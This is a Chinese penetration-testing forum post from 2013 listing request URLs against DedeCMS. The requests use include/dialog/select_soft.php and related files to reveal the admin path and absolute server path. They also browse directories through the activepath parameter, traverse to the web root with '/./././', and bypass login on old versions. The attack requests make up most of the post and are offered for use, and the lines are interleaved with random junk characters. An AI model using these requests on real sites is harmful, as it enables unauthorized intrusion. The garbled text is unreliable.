找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
返回列表 发新帖
查看: 3142|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
( |4 _  g  u7 r
; i; e% p* S8 P6 C. C员帐号,新版本的就直接转向了后台.' U1 P, L/ _# r: X
7 ^3 x: K+ u& u2 x8 W
2.include/dialog/config.php会爆出后台管理路径
; T" W' e# m, U+ c' y
% X9 ]1 |/ E& O* [3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
4 `! q+ R2 Z# c  V! e9 v( G- W' d4 n4 H: y
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
! d- Z8 i; r- L1 P2 \! d4 n! e
# @: L5 o& {1 e$ s" W5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
& s3 r6 z  G4 p" J! z0 L' y. O6 y, {9 L
到根目录去.不过这些版本的访问地址有些不同.1 o! S" D$ K' M) T* x" ~
地址为require/dialog/select_soft.php?activepath=/././././././././5 n/ j$ b( M. c6 h6 x" ~( g% Z6 V
: y# u1 V0 x+ Q5 E. L! {
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
7 ]2 B( w& {2 x5 W存在相同问题的文件还有: d- I% _  L" I' [5 t; m8 x9 y
include\dialog\select_images.php  P6 M( o  f3 Y& J1 b7 p
include\dialog\select_media.php$ T1 ^. e9 o2 l7 ]6 u" @3 I; C
include\dialog\select_templets.php​
2 H4 J8 L- z! R1 M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表